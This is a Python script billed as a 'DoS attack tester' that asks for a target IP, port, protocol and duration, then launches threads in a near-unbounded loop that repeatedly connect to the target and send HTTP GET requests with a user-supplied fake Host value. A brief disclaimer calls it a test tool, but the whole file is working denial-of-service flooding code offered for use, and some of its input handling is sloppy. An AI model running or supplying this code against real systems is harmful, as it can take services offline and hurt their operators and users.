import threading
import socket
import time
print('Do not use this to do anything illegal. It was created merely to test what a DoS attack can do.')
time.sleep(1)
print('------------------------------------')
time.sleep(1)
u=input("enter fake ip (any random ip is fine) (ex: 123.456.78.910): ")
fake_ip=str(u)
time.sleep(1)
print('------------------------------------')
time.sleep(1)
x=input("enter target IP (currently not accepting domain names ~~ must be numerical ip): ")
target=str(x)
time.sleep(1)
print("target IP is set as "+x)
time.sleep(1)
print('------------------------------------')
time.sleep(1)
print('REMINDER:ports for html are 80')
y=input("enter port: ")
port=int(y)
print("set port "+y)
time.sleep(1)
print('------------------------------------')
time.sleep(1)
p=input("enter 1 for TCP. enter 2 for UDP: ")
if p==1:
    p=str(socket.SOCK_STREAM)
if p==2:
    p=str(socket.SOCK_DGRAM)
time.sleep(1)
print('------------------------------------')
time.sleep(1)
printnum=1
def yeet():
    while True:
        if int(time.time())<=int(timer):
            q=socket.socket(socket.AF_INET,int(p))
            q.connect((target,port))
            q.sendto(("GET /" + target + " HTTP/1.1\r\n").encode("ascii"), (target,port))
            q.sendto(("Host: " + fake_ip + "\r\n\r\n").encode("ascii"), (target,port))
            q.close()
        else:
            break
timer2=input('how many seconds do you want the attck to last(ex: 30): ')
time.sleep(1)
print('------------------------------------')
time.sleep(1)
input("press enter to proceed")
timer=int(timer2)+int(time.time())+int(8)
time.sleep(1)
print('------------------------------------')
time.sleep(1)
print('IF YOU NEED TO STOP AT ANY TIME DO CTRL+C')
time.sleep(1)
print('_____5_____')
time.sleep(1)
print('_____4_____')
time.sleep(1)
print('_____3_____')
time.sleep(1)
print('_____2_____')
time.sleep(1)
print('_____1_____')
time.sleep(1)
print('initialized')
d=0
e=0
for d in range(0,10000000000000000000):
    if int(time.time())<=int(timer):
        thread = threading.Thread(target=yeet)
        thread.start()
        print(printnum)
        d=d+1
        printnum=printnum+1
    else:
        break
print('done')
time.sleep(1)
print('------------------------------------')
time.sleep(1)
print("If there was a big mess of text that said error and stuff, you messed up on one of the inputs. try again")
time.sleep(1)
print('------------------------------------')
time.sleep(1)
print('\033[1;33;40m\n')
print('   xxx ')
time.sleep(0.5)
print(' x     x')
time.sleep(0.5)
print('x 0   0 x')
time.sleep(0.5)
print('x       x')
time.sleep(0.5)
print(' x ___/x')
time.sleep(0.5)
print('   xxx')
time.sleep(1)
print()
time.sleep(1)
print('thanks for using my DoS attack tester')
time.sleep(1)
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
time.sleep(0.5)